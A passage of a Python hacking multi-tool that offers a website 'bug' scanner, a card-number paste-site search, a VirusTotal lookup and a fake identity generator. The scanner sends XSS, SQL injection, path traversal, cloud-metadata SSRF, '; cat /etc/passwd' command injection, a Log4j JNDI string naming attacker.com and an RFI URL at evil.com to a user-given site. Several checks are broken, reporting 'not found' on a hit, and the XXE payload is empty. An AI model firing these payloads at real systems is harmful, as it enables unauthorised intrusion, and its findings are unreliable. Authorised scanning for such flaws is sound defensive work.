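# check_password_leak() uses the Have I Been Pwned k-anonymity range endpoint: only the first five hex characters of the SHA-1 hash are sent, and the returned suffix:count lines are matched against the remaining 35 characters locally.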
1592 | 1593 | password = input(f"{White}[{Blue}+{White}] Enter the pass : {Blue}") 1594 | print(check_password_leak(password)) 1595 | elif selection == "18" or selection == "Scan Websites For Bugs" or selection == "SCAN WEBSITES FOR BUGS" or selection == "scan websites for bugs": 1596 | print(f"{Red}Warning : To avoid legal problems, seek permission from the website owner before scanning.") 1597 | url = input(f"\n{White}[{Blue}+{White}] Enter the target website URL (ex: https://example.com) : {Blue}") 1598 | 1599 | results = [] 1600 | 1601 | def add_result(test_name, status, details, severity): 1602 | result = [test_name, status, details] 1603 | results.append(result) 1604 | 1605 | def server(url): 1606 | response = requests.get(url) 1607 | server = response.headers.get('Server') 1608 | if server: add_result("Server Info", f"{Cyan}Info{White}", f"{Cyan}The server is running {Blue}{server}{White}", "Info") 1609 | else: add_result("Server Info", f"{Cyan}Info{White}", f"{Yellow}No server info found in headers{White}", "Info") 1610 | try: 1611 | domain = url.split('//')[1].split('/')[0] 1612 | ip_address = socket.gethostbyname(domain) 1613 | add_result("IP", f"{Cyan}Info{White}", f"{Cyan}The IP of {Blue}{domain}{Cyan} is {Blue}{ip_address}{White}", "Info") 1614 | except socket.gaierror: add_result("IP", f"{Yellow}Error{White}", f"{Yellow}Could not resolve IP{White}", "High") 1615 | 1616 | def web_components(url): 1617 | response = requests.get(url) 1618 | soup = BeautifulSoup(response.text, 'html.parser') 1619 | scripts = soup.find_all('script') 1620 | if scripts: add_result("Script Tags", f"{Cyan}Info{White}", f"{Blue}Found {len(scripts)} script tags{White}", "Info") 1621 | else: add_result("Script Tags", f"{Cyan}Info{White}", f"{Yellow}Script tags not found{White}", "Info") 1622 | 1623 | def xss(url): 1624 | xss_payloads = [ # reflected-XSS probes; representative script-tag payloads (assumed) 1625 | "<script>alert('XSS')</script>", 1626 | "\"><script>alert('XSS')</script>", 1627 | "'><script>alert('XSS')</script>"] 1628 | Bug = False 1629 | for payload in xss_payloads: 1630 | response = requests.get(url, params={'q': payload}) 1631 | if payload in response.text: 1632 | add_result("XSS/Cross Site Scripting", f"{Red}Bug{White}", f"{Red}Payload : {payload}{White}", "High") 1633 | Bug = True 1634 | if not Bug: add_result("XSS/Cross Site Scripting", f"{Green}No bug{White}", f"{Green}No payloads were executed{White}", "Low") 1635 | 1636 | def sql_injection(url): 1637 | sql_payloads = [ 1638 | "' OR '1'='1", 1639 | "' OR '1'='1' --", 1640 | "' OR '1'='1' /*", 1641 | "' OR '1'='1' #"] 1642 | Bug = False 1643 | for payload in sql_payloads: 1644 | response = requests.get(url, params={'id': payload}) 1645 | if any(error in response.text for error in ["SQL syntax", "mysql", "syntax error", "unclosed quotation mark"]): 1646 | add_result("SQL Injection", f"{Red}Bug{White}", f"{Red}Payload : {payload}{White}", "High") 1647 | Bug = True 1648 | if not Bug: add_result("SQL Injection", f"{Green}No bug{White}", f"{Green}No payloads were executed{White}", "Low") 1649 | 1650 | def header_injection(url): 1651 | injection_payload = '"><script>alert(1)</script>' # representative reflected payload for the User-Agent header (assumed) 1652 | headers = {'User-Agent': injection_payload} 1653 | response = requests.get(url, headers=headers) 1654 | if injection_payload in response.text: add_result("Header Injection", f"{Red}Bug{White}", "Payload in User-Agent header", "High") 1655 | else: add_result("Header Injection", f"{Green}No bug{White}", f"{Green}Header Injection bug not found{White}", "Low") 1656 | 1657 | def idor(url): 1658 | response = requests.get(f"{url}/user/1") 1659 | if response.status_code == 200: add_result("IDOR (Insecure Direct Object Reference)", 
f"{Red}Bug{White}", "Able to access user data", "High") 1660 | else: add_result("IDOR (Insecure Direct Object Reference)", f"{Green}No bug{White}", f"{Green}IDOR bug not found{White}", "Low") 1661 | 1662 | def path_traversal(url): 1663 | traversal_payloads = [ 1664 | "../../etc/passwd", 1665 | "../../../../etc/passwd" ] 1666 | Bug = False 1667 | for payload in traversal_payloads: 1668 | response = requests.get(f"{url}/{payload}") 1669 | if "root:" in response.text: 1670 | add_result("Path Traversal", f"{Red}Bug{White}", f"{Red}Payload : {payload}{White}", "High") 1671 | Bug = True 1672 | if not Bug: add_result("Path Traversal", f"{Green}No bug{White}", f"{Green}Path Traversal bug not found{White}", "Low") 1673 | 1674 | def ssrf(url): 1675 | ssrf_payload = 'http://169.254.169.254/latest/meta-data/' 1676 | try: 1677 | response = requests.get(url, params={'url': ssrf_payload}) 1678 | if "instance-id" in response.text: add_result("SSRF (Server-Side Request Forgery)", f"{Red}Bug{White}", f"{Red}Payload: {ssrf_payload}{White}", "High") 1679 | else: add_result("SSRF (Server-Side Request Forgery)", f"{Green}No bug{White}", f"{Green}SSRF bug not found{White}", "Low") 1680 | except requests.exceptions.RequestException: add_result("SSRF", "Error", "Request failed", "High") 1681 | 1682 | def xxe(url): 1683 | xml_payload = """ 1684 | 1685 | ]> 1686 | &xxe;""" 1687 | headers = {'Content-Type': 'application/xml'} 1688 | response = requests.post(url, data=xml_payload, headers=headers) 1689 | if "root:x:0:0:" in response.text: add_result("XXE (XML External Entity)", f"{Red}Bug{White}", f"{Red}Able to read system files{White}", "High") 1690 | else: add_result("XXE (XML External Entity)", f"{Green}No bug{White}", f"{Green}XXE bug not found{White}", "Low") 1691 | 1692 | def rce(url): 1693 | rce_payload = "; cat /etc/passwd" 1694 | response = requests.get(f"{url}/?cmd={rce_payload}") 1695 | if "root:x:0:0:" in response.text: add_result("RCE (Remote Code Execution)/PHP Code Injection", f"{Red}Bug{White}", f"{Red}Able to execute arbitrary commands{White}", "High") 1696 | else: add_result("RCE (Remote Code Execution)/PHP Code Injection", f"{Green}No bug{White}", f"{Green}RCE bug not found{White}", "Low") 1697 | 1698 | def log4j(url): 1699 | log4j_payload = "${jndi:ldap://attacker.com/a}" 1700 | headers = {'User-Agent': log4j_payload} 1701 | response = requests.get(url, headers=headers) 1702 | if "java.naming.provider.url" in response.text: add_result("Log4j", f"{Red}Bug{White}", "Log4j bug not found", "High") 1703 | else: add_result("Log4j", f"{Green}No bug{White}", f"{Green}Log4j bug not found{White}", "Low") 1704 | 1705 | def lfi(url): 1706 | lfi_payload = "/etc/passwd" 1707 | response = requests.get(f"{url}?file={lfi_payload}") 1708 | if "root:x:0:0:" in response.text: add_result("LFI (Local File Include)", f"{Red}Bug{White}", "LFI bug not found", "High") 1709 | else: add_result("LFI (Local File Include)", f"{Green}No bug{White}", f"{Green}LFI bug not found{White}", "Low") 1710 | 1711 | def rfi(url): 1712 | rfi_payload = "http://evil.com/malicious.php" 1713 | response = requests.get(f"{url}?file={rfi_payload}") 1714 | if "malicious content" in response.text: add_result("RFI (Remote File Include)", f"{Red}Bug{White}", "RFI bug not found", "High") 1715 | else: add_result("RFI (Remote File Include)", f"{Green}No bug{White}", f"{Green}RFI bug not found{White}", "Low") 1716 | 1717 | def info_disclosure(url): 1718 | response = requests.get(url) 1719 | if any(keyword in response.text for keyword in ["password", 
"username", "secret"]): add_result("Info Disclosure", f"{Red}Bug{White}", f"{Red}Sensitive info disclosed{White}", "High") 1720 | else: add_result("Info Disclosure", f"{Green}No bug{White}", f"{Green}Sensitive info not found{White}", "Low") 1721 | 1722 | def unrestricted_resource_consumption(url): 1723 | large_payload = 'A' * 1000000 1724 | try: 1725 | response = requests.post(url, data={'input': large_payload}) 1726 | if response.status_code == 200: add_result("Unrestricted Resource Consumption", f"{Red}Bug{White}", f"{Red}Server accepts large payloads{White}", "High") 1727 | else: add_result("Unrestricted Resource Consumption", f"{Green}No bug{White}", f"{Green}unrestricted resource consumption bug not found{White}", "Low") 1728 | except requests.exceptions.RequestException: add_result("Unrestricted Resource Consumption", f"{Yellow}Error{White}", f"{Yellow}Request failed{White}", "High") 1729 | 1730 | def broken_authentication(url): 1731 | login_payload = {'username': 'admin', 'password': 'password'} 1732 | response = requests.post(f"{url}/login", data=login_payload) 1733 | if response.status_code == 200 and "Welcome" in response.text: add_result("Broken Authentication", f"{Red}Bug{White}", f"{Red}Default credentials work{White}", "High") 1734 | else: add_result("Broken Authentication", f"{Green}No bug{White}", f"{Green}broken authentication bug not found{White}", "Low") 1735 | 1736 | def bola(url): 1737 | test_object_id = "12345" 1738 | unauthorized_user_id = "67890" 1739 | response = requests.get(f"{url}/objects/{test_object_id}") 1740 | if unauthorized_user_id in response.text: add_result("BOLA", f"{Red}Bug{White}", f"{Red}Object accessed with ID : {unauthorized_user_id}{White}", "High") 1741 | else: add_result("BOLA", f"{Green}No bug{White}", f"{Green}BOLA bug not found{White}", "Low") 1742 | 1743 | def sensitive_info(url): 1744 | response = requests.get(url) 1745 | soup = BeautifulSoup(response.text, 'html.parser') 1746 | sensitive_keywords = ["password", "username", "admin", "secret"] 1747 | found = False 1748 | for keyword in sensitive_keywords: 1749 | if keyword in soup.text: 1750 | add_result("Sensitive Info", f"{Red}Bug{White}", f"{Red}Found keyword '{keyword}'{White}", "Medium") 1751 | found = True 1752 | if not found: add_result("Sensitive Info", f"{Green}Not Found{White}", f"{Green}Sensitive info not found{White}", "Low") 1753 | 1754 | def run_security_checks(url): 1755 | checks = [server, web_components, xss, sql_injection, header_injection, idor, path_traversal, ssrf, xxe, rce, log4j, lfi, rfi, info_disclosure, unrestricted_resource_consumption, broken_authentication, bola, sensitive_info] 1756 | 1757 | for check in checks: 1758 | check(url) 1759 | 1760 | print(f"{White}Scanning...") 1761 | 1762 | run_security_checks(url) 1763 | print(f"{White}[ Scan for {Blue}{url} {Green}✓{White} ]\n") 1764 | time.sleep(1) 1765 | 1766 | print(tabulate(results, headers=["Test", "Status", "Details"], tablefmt="grid")) 1767 | elif selection == "19" or selection == "Get MacAddress" or selection == "GET MACADDRESS" or selection == "get macaddress": 1768 | print(f"{White}Getting...") 1769 | time.sleep(3) 1770 | print(f"{White}[ Get for {Blue}{socket.gethostname()} {Green}✓{White} ]{Blue}") 1771 | time.sleep(1) 1772 | 1773 | try: os.system("getmac") 1774 | except BaseException as msg: print(f"{White}[{Red}-{White}] {Red}Error : {msg}{White}") 1775 | elif selection == "20" or selection == "Bank Cards OSINT" or selection == "BANK CARD OSINT" or selection == "bank card osint": 1776 | urls = [] 
1777 | qlist = []
1778 | total_url = []
1779 | paste_sites = ["cl1p.net", "dpaste", "dumpz.org", "hastebin", "ideone", "pastebin", "pw.fabian-fingerle.de", "gist.github.com", "https://www.heypasteit.com/", "ivpaste.com", "mysticpaste.com", "paste.org.ru", "paste2.org", "sebsauvage.net/paste/", "slexy.org", "squadedit.com", "wklej.se", "textsnip.com"]
1780 |
1781 | card = input(f"{White}[{Blue}+{White}] Enter card number : {Blue}")
1782 |
1783 | print(f"{White}Searching...")
1784 |
1785 | try:
1786 | val = int(card)
1787 | if len(str(val)) >= 12 and len(str(val)) <= 19:
1788 | for site in paste_sites:
1789 | query = "{} {}".format(site, card)
1790 | qlist.append(query)
1791 | for entry in qlist:
1792 | for url in search(entry, pause=2.0, stop=20, user_agent="Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"):
1793 | urls.append(url)
1794 |
1795 | print(f"[ Search for {Blue}{card} {Green}✓{White} ]")
1796 | time.sleep(1)
1797 |
1798 | for item in urls:
1799 | for site in paste_sites:
1800 | if "{}".format(site) in item:
1801 | print(f"{White}[{Blue}-{White}] {item}")
1802 | total_url.append(item)
1803 | else: print(f"\n{Red}Invalid card number!")
1804 | total = len(total_url)
1805 | if total == 0: print(f"\n{White}[{Green}✓{White}] No leaks for this card number found.")
1806 | else: print(f"\n{White}[{Green}✓{White}] {str(total)} dumps found. ")
1807 | except ValueError: print(f"\n{Red}Invalid card number entered!")
1808 | elif selection == "21" or selection == "Scan Links For Malwares" or selection == "SCAN LINKS FOR MALWARES" or selection == "scan links for malwares":
1809 | malicious = 0
1810 | suspicious = 0
1811 |
1812 | link = input(f"{White}[{Blue}+{White}] Enter the link : {Blue}")
1813 | url = f"https://www.virustotal.com/ui/search?limit=20&relationships%5Bcomment%5D=author%2Citem&query={link}"
1814 | headers = {
1815 | "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
1816 | "X-Tool": "vt-ui-main",
1817 | "X-VT-Anti-Abuse-Header": "MTA3OTM2NjUwMjctWkc5dWRDQmlaU0JsZG1scy0xNjMxMTE3NzQyLjY1",
1818 | "Accept-Language": "en-US,en;q=0.9,es;q=0.8", }
1819 | try:
1820 | r = requests.get(url, headers=headers).json()
1821 | data = r['data']
1822 | for names in data:
1823 | malicious = names['attributes']['last_analysis_stats']['malicious']
1824 | suspicious = names['attributes']['last_analysis_stats'].get('suspicious', 0)
1825 | name = names['attributes']['last_analysis_results']
1826 | for info in name:
1827 | result = name[info]['result']
1828 |
1829 | if suspicious > 0: print(f"{White}[{Yellow}-{White}] Suspicious")
1830 | elif malicious > 0: print(f"{White}[{Red}-{White}] Virus!")
1831 | else: print(f"{White}[{Yellow}✓{White}] Clean")
1832 | except BaseException as msg: print(f"{Red}E: {msg}")
1833 | elif selection == "22" or selection == "Create Fake Personal Info" or selection == "CREATE FAKE PERSONAL INFO" or selection == "create fake personal info":
1834 | print(f"""{Blue}• {White}Arabic {{
1835 | {White}[{Blue}1{White}] United Arab Emirates [ar_AE]
1836 | {White}[{Blue}2{White}] Bahrain [ar_BH]
1837 | {White}[{Blue}3{White}] Egypt [ar_EG]
1838 | {White}[{Blue}5{White}] Jordan [ar_JO]
1839 | {White}[{Blue}6{White}] Palestine [ar_PS]
1840 | {White}[{Blue}7{White}] Kingdom Of Saudi Arabia [ar_SA] }}
1841 | {Blue}• {White}Azerbaijani {{ {White}[{Blue}1{White}] Azerbaijan [az_AZ] }}
1842 | {Blue}• {White}Bulgarian {{
1843 | {White}[{Blue}1{White}] Bulgaria [bg_BG]
1844 | {White}[{Blue}2{White}] Bangladesh [bg_BD]
1845 |
{White}[{Blue}3{White}] Bosnia and Herzegovina [bg_BA] }} 1846 | {Blue}• {White}Czech {{ {White}[{Blue}1{White}] Czech Republic [cs_CZ] }} 1847 | {Blue}• {White}Danish {{ {White}[{Blue}1{White}] Denmark [da_DK] }} 1848 | {Blue}• {White}German {{ 1849 | {White}[{Blue}1{White}] German Lang [de] 1850 | {White}[{Blue}2{White}] Austria [de_AT] 1851 | {White}[{Blue}3{White}] Switzerland [de_CH] 1852 | {White}[{Blue}4{White}] Germany [de_DE] 1853 | {White}[{Blue}5{White}] Denmark [de_DK] }} 1854 | {Blue}• {White}Greek {{ {White}[{Blue}1{White}] Greece [el_GR] }} 1855 | {Blue}• {White}English {{ 1856 | {White}[{Blue}01{White}] English Lang [en] 1857 | {White}[{Blue}02{White}] Australi [en_AU] 1858 | {White}[{White}03{White}] Bangladesh [en_BD] 1859 | {White}[{Blue}04{White}] Canada [en_CA] 1860 | {White}[{Blue}05{White}] United Kingdom [en_GB] 1861 | {White}[{Blue}06{White}] Ireland [en_IE] 1862 | {White}[{Blue}07{White}] Car [en_IN] 1863 | {White}[{Blue}08{White}] New Zealand [en_NZ] 1864 | {White}[{Blue}09{White}] Philippines [en_PH] 1865 | {White}[{Blue}10{White}] Thailand [en_TH] 1866 | {White}[{Blue}11{White}] United States [en_US] }} 1867 | {Blue}• {White}Spanish {{ 1868 | {White}[{Blue}1{White}] Spanish Lang [es] 1869 | {White}[{Blue}2{White}] Argentina [es_AR] 1870 | {White}[{Blue}3{White}] Canada [es_CA] 1871 | {White}[{Blue}4{White}] Chile [es_CL] 1872 | {White}[{Blue}5{White}] Colombia [es_CO] 1873 | {White}[{Blue}6{White}] Estonia [es_ES] 1874 | {White}[{Blue}7{White}] Mexico [es_MX] }} 1875 | {Blue}• {White}Estonian {{ {White}[{Blue}1{White}] Estonia [et_EE] }} 1876 | {Blue}• {White}Persian {{ {White}[{Blue}1{White}] Iran [fa_IR] }} 1877 | {Blue}• {White}Finnish {{ {White}[{Blue}1{White}] Finland [fi_FI] }} 1878 | {Blue}• {White}Philippines {{ {White}[{Blue}1{White}] Philippines [fil_PH] }} 1879 | {Blue}• {White}French {{ 1880 | {White}[{Blue}1{White}] Belgium [fr_BE] 1881 | {White}[{Blue}2{White}] Canada [fr_CA] 1882 | {White}[{Blue}3{White}] Switzerland [fr_CH] 1883 | {White}[{Blue}4{White}] France [fr_FR] 1884 | {White}[{Blue}5{White}] Quebec Canada [fr_QC] }} 1885 | {Blue}• {White}Irish {{ {White}[{Blue}1{White}] Ireland [ga_IE] }} 1886 | {Blue}• {White}Hebrew {{ {White}[{Blue}1{White}] Israel [he_IL] }} 1887 | {Blue}• {White}Hindi {{ {White}[{Blue}1{White}] Car [hi_IN] }} 1888 | {Blue}• {White}Hungarian {{ {White}[{Blue}1{White}] Croatia [hu_HU] }} 1889 | {Blue}• {White}Armenian {{ {White}[{Blue}1{White}] Armenia [hy_AM] }} 1890 | {Blue}• {White}Indonesian {{ {White}[{Blue}1{White}] Indonesia [id_ID] }} 1891 | {Blue}• {White}Italian {{ 1892 | {White}[{Blue}1{White}] Canada [it_CA] 1893 | {White}[{Blue}2{White}] Italy [it_IT] }} 1894 | {Blue}• {White}Japanese {{ {White}[{Blue}1{White}] Japan [ja_JP] }} 1895 | {Blue}• {White}Georgian {{ {White}[{Blue}1{White}] Georgia [ka_GE] }} 1896 | {Blue}• {White}Korean {{ {White}[{Blue}1{White}] Korea [ko_KR] }} 1897 | {Blue}• {White}Latin {{ {White}[{Blue}1{White}] Latin Lang [la] }} 1898 | {Blue}• {White}Luxembourgish {{ {White}[{Blue}1{White}] Luxembourg [lb_LU] }} 1899 | {Blue}• {White}Lithuanian {{ {White}[{Blue}1{White}] Lithuania [lt_LT] }} 1900 | {Blue}• {White}Latvian {{ {White}[{Blue}1{White}] Latvia [lv_LV] }} 1901 | {Blue}• {White}Maltese {{ {White}[{Blue}1{White}] Malta [mt_MT] }} 1902 | {Blue}• {White}Nepali {{ {White}[{Blue}1{White}] Nepal [ne_NP] }} 1903 | {Blue}• {White}Dutch {{ 1904 | {White}[{Blue}1{White}] Belgium [nl_BE] 1905 | {White}[{Blue}2{White}] Netherlands, Kingdom of the [nl_NL] }} 1906 | {Blue}• {White}Norsk {{ 
{White}[{Blue}1{White}] Norway [no_NO] }} 1907 | {Blue}• {White}Oriya {{ {White}[{Blue}1{White}] Car [or_IN] }} 1908 | {Blue}• {White}Polish {{ {White}[{Blue}1{White}] Poland [pl_PL] }} 1909 | {Blue}• {White}Portuguese {{ 1910 | {White}[{Blue}1{White}] Brazil [pt_BR] 1911 | {White}[{Blue}2{White}] Portugal [pt_PT] }} 1912 | {Blue}• {White}Romanian {{ {White}[{Blue}1{White}] Rome [ro_RO] }} 1913 | {Blue}• {White}Russian {{ {White}[{Blue}1{White}] Russia [ru_RU] }} 1914 | {Blue}• {White}Slovak {{ {White}[{Blue}1{White}] Slovakia [sk_SK] }} 1915 | {Blue}• {White}Slovenian {{ {White}[{Blue}1{White}] Slovenia [sl_SL] }} 1916 | {Blue}• {White}Albanian {{ {White}[{Blue}1{White}] Albania [sq_AL] }} 1917 | {Blue}• {White}Swedish {{ {White}[{Blue}1{White}] Sweden [sv_SE] }} 1918 | {Blue}• {White}Tamil {{ {White}[{Blue}1{White}] Car [ta_IN] }} 1919 | {Blue}• {White}Thai {{ 1920 | {White}[{Blue}1{White}] Thai Lang [th] 1921 | {White}[{Blue}2{White}] Thailand [th_TH] }} 1922 | {Blue}• {White}Tagalog {{ {White}[{Blue}1{White}] Philippines [tl_PH] }} 1923 | {Blue}• {White}Turkish {{ {White}[{Blue}1{White}] Türkiye [tr_TR] }} 1924 | {Blue}• {White}Twi {{ {White}[{Blue}1{White}] Ghana [tw_GH] }} 1925 | {Blue}• {White}Ukrainian {{ {White}[{Blue}1{White}] Ukraine [uk_UA] }} 1926 | {Blue}• {White}Vietnamese {{ {White}[{Blue}1{White}] Vietnam [vi_VN] }} 1927 | {Blue}• {White}Yorba {{ {White}[{Blue}1{White}] Nigeria [yo_NG] }} 1928 | {Blue}• {White}Chinese {{ 1929 | {White}[{Blue}1{White}] China [zh_CN] 1930 | {White}[{Blue}2{White}] Taiwan [zh_TW] 1931 | {White}[{Blue}3{White}] South Africa [zh_ZA] }}""") 1932 | 1933 | choose = input(f"{White}[{Blue}+{White}] Enter the lang & country code (ex: ar_SA) : {Blue}") 1934 | 1935 | lang_and_country_list = [ 1936 | "ar_AE", "ar_BH", "ar_EG", "ar_JO", "ar_PS", "ar_SA", "az_Az", "bg_BG", "bg_BD", "bg_BA", 1937 | "cs_CZ", "da_DK", "de", "de_AT", "de_CH", "de_DE", "de_DK", "el_GR", "en", "en_AU", 1938 | "en_BD", "en_CA", "en_GB", "en_IE", "en_IN", "en_NZ", "en_PH", "en_TH", "en_US", "es", 1939 | "es_AR", "es_CA", "es_CL", "es_CO", "es_ES", "es_MX", "et_EE", "fa_IR", "fi_FI", "fil_PH", 1940 | "fr_BE", "fr_CA", "fr_CH", "fr_FR", "fr_QC", "ga_IE", "he_IL", "hi_IN", "hu_HU", "hy_AM", 1941 | "id_ID", "it_CA", "it_IT", "ja_JP", "ka_GE", "ko_KR", "la", "lb_LU", "lt_LT", "lv_LV", 1942 | "mt_MT", "ne_NP", "nl_BE", "nl_NL", "no_NO", "or_IN", "pl_PL", "pt_BR", "pt_PT", "ro_RO", 1943 | "ru_RU", "sk_SK", "sl_SL", "sq_AL", "sv_SE", "ta_IN", "th", "th_TH", "tl_PH", "tr_TR", 1944 | "tw_GH", "uk_UA", "vi_VN", "yo_NG", "zh_CN", "zh_TW", "zh_ZA"] 1945 | 1946 | if choose in lang_and_country_list: 1947 | print(f"{White}Creating...") 1948 | time.sleep(3) 1949 | print(f"[ Create for {Blue}{choose} {Green}✓{White} ]") 1950 | time.sleep(1) 1951 | 1952 | fake = faker.Faker(choose) 1953 | 1954 | import datetime 1955 | 1956 | dt = datetime.datetime.now() 1957 | 1958 | fake_age = fake.random_int(min=18, max=60) 1959 | birth_year = dt.year - fake_age 1960 | 1961 | social_status = ["Student", "Graduate", "Employee", "Unemployed", "Single", "Engaged", "Married"] 1962 | social_status_choice = random.choice(social_status) 1963 | phones = [ 1964 | "Honor V30", "Honor 30 Pro", "Honor 8A Prime", "Honor Play 9A", "Honor 30S", "Honor Play 4T", "Honor Play Pro", 1965 | "Honor 8A 2020", "Honor 20e", "Honor 30", "Honor Pro+", "Honor 9X Lite", "Honor 9C", "Honor 9S", "Honor 9A", 1966 | "Honor X10", "Honor Play 4", "Honor Play 4 Pro", "Honor 30 Lite", "Honor X10", "Honor 30i", "Honor 10X Lite", 1967 | "Honor V40", 
"Honor V40 Lite", "Honor Play 5T Youth", "Honor Play 20", "Honor Play 5", "Honor 60", "Honor 50 Pro", 1968 | "Honor 50 SE", "Honor X20 SE", "Honor Play 5T Pro", "Honor Magic3" , "Honor Magic3 Pro", "Honor Magic3 Pro+", 1969 | "Honor X20", "Honor 50 Lite", "Honor X30 MAX", "Honor X30i", "Honor 60", "Honor 60 Pro", "Honor Play 30 Plus", 1970 | "Huawei Mate 30", "Huawei Nova" "Huawei Nova 6", "Huawei Nova 5G", "Huawei Nova SE", "Huawei P40 Lite", 1971 | "Huawei P40", "Huawei Nova" "Huawei Nova 7", "Huawei Nova 7 Pro", "Huawei Nova 7 SE", "Huawei P40 Lite 5G", 1972 | "Huawei Nova 7 SE 5G Youth", "Huawei Mate 40", "Huawei Nova 8 SE", "Huawei Nova 8 5G", "Huawei Nova 8 Pro", 1973 | "Huawei Mate X2", "Huawei Nova 8 Pro 4G", "Huawei Nova 8i", "Huawei Nova 8 SE Youth", "Huawei P50", 1974 | "Huawei P50 Pro", "Huawei Enjoy 20e", "Huawei Nova 9", "Huawei Nova Y60", "Huawei P50 Pocket", "Huawei Nova 9 SE", 1975 | "Huawei Nova 9 SE 5G", "Huawei Nova Y70", "Huawei Nova Y70 Plus", "Huawei Nova Y90", "Huawei Mate Xs 2", 1976 | "Huawei Nova 10", "Huawei Mate 50", "Huawei Mate 50 Pro", "Huawei Mate 50 RS", "Huawei Mate 10 SE", 1977 | "Huawei Mate Y61", "Samsung Galaxy A51", "Samsung Galaxy A71," "Samsung Galaxy A01", "Samsung Galaxy Xcover Pro", 1978 | "Samsung Galaxy Z Flip", "Samsung Galaxy S20", "Samsung Galaxy S20+", "Samsung Galaxy S20 Ultra", 1979 | "Samsung Galaxy A31", "Samsung Galaxy A11", "Samsung Galaxy A41", "Samsung Galaxy A51", "Samsung Galaxy A51 5G", 1980 | "Samsung Galaxy A71 5G", "Samsung Galaxy A21", "Samsung Galaxy A21s", "Samsung Galaxy A21 5G UW", 1981 | "Samsung Galaxy Z Flip 5G", "Samsung Galaxy Note 20", "Samsung Galaxy Note 20 Ultra", "Samsung Galaxy Z Fold 2", 1982 | "Samsung Galaxy A01 Core", "Samsung Galaxy A51 5G UW", "Samsung Galaxy A42 5G", "Samsung Galaxy S20 FE", 1983 | "Samsung Galaxy F41", "Samsung Galaxy M21s", "Samsung Galaxy A12", "Samsung Galaxy A02s", 1984 | "Samsung Galaxy A32 5G", "Samsung Galaxy S21", "Samsung Galaxy S21+", "Samsung Galaxy S21 Ultra", 1985 | "Samsung Galaxy A02", "Samsung Galaxy M02", "Samsung Galaxy M12", "Samsung Galaxy F62", "Samsung Galaxy M62", 1986 | "Samsung Galaxy A32", "Samsung Galaxy Xcover 5", "Samsung Galaxy A52/A52 5G", "Samsung Galaxy A72", 1987 | "Samsung Galaxy F02s", "Samsung Galaxy F12", "Samsung Galaxy Quantum 2", "Samsung Galaxy F52 5G", 1988 | "Samsung Galaxy M32", "Samsung Galaxy A22", "Samsung Galaxy A22 5G", "Samsung Galaxy Z Fold 3", 1989 | "Samsung Galaxy Z Flip 3", "Samsung Galaxy M52 5G", "iPhone 6", "iPhone 6s", "iPhone 6 Plus", "iPhone 6s Plus", 1990 | "iPhone 7", "iPhone 7 Plus", "iPhone 8", "iPhone 8 Plus", "iPhone X", "iPhone XR", "iPhone XS", "iPhone XS Max", 1991 | "iPhone SE", "iPhone 12", "iPhone 12 Mini", "iPhone 12 Pro", "iPhone 12 Pro Max", "iPhone 13", "iPhone 13 Mini", 1992 | "iPhone 13 Pro", "iPhone 13 Pro Max", "iPhone 14", "iPhone 14 Plus", "iPhone 14 Pro", "iPhone 14 Pro Max", 1993 | "iPhone 15", "iPhone 15 Plus", "iPhone 15 Pro", "iPhone 15 Pro Max"] 1994 | cars = [ 1995 | "Toyota Yaris Sedan 2013", "Toyota Yaris Sedan 2024 Y", "Toyota Yaris Sedan 2024 Y Plus"," Toyota Yaris Sedan 2024 YX", 1996 | "Toyota Yaris Sedan 2014 Fleet", "Toyota Yaris Sedan 2017 manual STD", "Toyota Yaris Sedan 2017 Y FLT", 1997 | "Toyota Yaris Sedan 2017 Limited", "Toyota Yaris Sedan 2019 Y MT", "Toyota Yaris Sedan 2019 Y", 1998 | "Toyota Yaris Sedan 2019 YX", "Kia Rio 2014", "Hyundai Accent 2022 Smart", "Toyota Corolla 2024 XLI", 1999 | "Chevrolet Cruze 2014 LT", "Honda Civic 2022 Sport", "MG GT 2024 Comfort", "Honda City 
2024 Sport", "Nissan Sunny 2017", 2000 | "Kia Rio 2023 EX", "Honda City 2003", "Hyundai Accent 2023 Smart Plus", "Ford Fiesta 2017", "Peugeot 207 2012 RC hatchback", 2001 | "Bentley Continental GT 2015", "Aston Martin DB9 2017", "Bentley Continental GT 2024", "Mercedes-Benz S-Class Coupe 2022", 2002 | "Ferrari GTC4Lusso 2017", "Maserati GranTurismo 2020", "BMW M5 2024 Competition", "Audi RS 6 2024", "BMW M5 2024", 2003 | "Porsche Taycan Turbo 2021", "GMC Sierra 2024 Elevetion", "GMC Sierra 2022 AT4", "Lexus LX 2011", "Lexus LS 2023", 2004 | "Mazda CX-3 2022 GS", "Mazda CX-3 2022 GTX", "Mazda CX-3 2022 GTL", "Mazda CX-3 2022 GT", "Mazda MX-5 2024", 2005 | "Ford Crown Victoria 2011", "Ford Crown Victoria 2009", "Chevrolet Caprice 2016 Royale", "Ford Taurus 2017 SHO", 2006 | "Chevrolet Impala 2019 LT", "Dodge Charger 2023 R/T Scatpack", "Toyota Avalon 2022 Limited", "Chevrolet Impala 2014 LS", 2007 | "Volkswagen Tiguan 2024 R-Line", "Honda CR-V 2023 DX", "Tesla Model X 2024", "Rolls Royce Ghost 2022", "Jaguar XJ 2020 TC", 2008 | "BMW 7-Series 2022 750Li", "Lexus LS 2023", "Mercedes-Benz S-Class 2024 S500", "Mercedes-Benz S-Class 2024 S450", 2009 | "Audi A8 2024 60 TFSI Quattro LWB", "Geely Preface 2025 GL", "Geely Preface 2025 GF", "MG 7 2024 STD", 2010 | "Hyundai Elantra 2024", "Ford Escort 2020", "Ford Escort 2021", "Dodge Viper 2017 SRT Viper GTS", 2011 | "Porsche 911 2024 Carrera 4 GTS", "Suzuki Carry 2013", "Nissan Patrol 2024 XE", "GMC Yukon 2007", 2012 | "Ford Expedition 2022 Limited", "Chevrolet Tahoe 2016 LTZ", "Hyundai Azera 2013", "Hyundai Azera 2024 Base", 2013 | "Chrysler 300C 2024", "Toyota Crown 2023", "Ford Taurus 2012", "Hyundai Elantra 2024", "BMW M4 2024 Competition", 2014 | "Toyota Camry 2003", "Chevrolet Malebu 2020 LS", "Chevrolet Malebu 2021 LS", "ALFA ROMEO 4C 2013", "Kia Cerato 2012", 2015 | "BMW 4-Series 2024 430i", "BMW 4-Series 2024 440i", "Hyundai Accent 2011", "Hyundai Accent 2021 Comfort"] 2016 | foods = [ 2017 | "Pasta", "Hamburger", "Shawarma", "Rice", "Potatoes", "Plants", "Sausage", "Noodles", "Kebab", "Popular Food", "Donuts", 2018 | "Eggs", "Spinach", "Pizza", 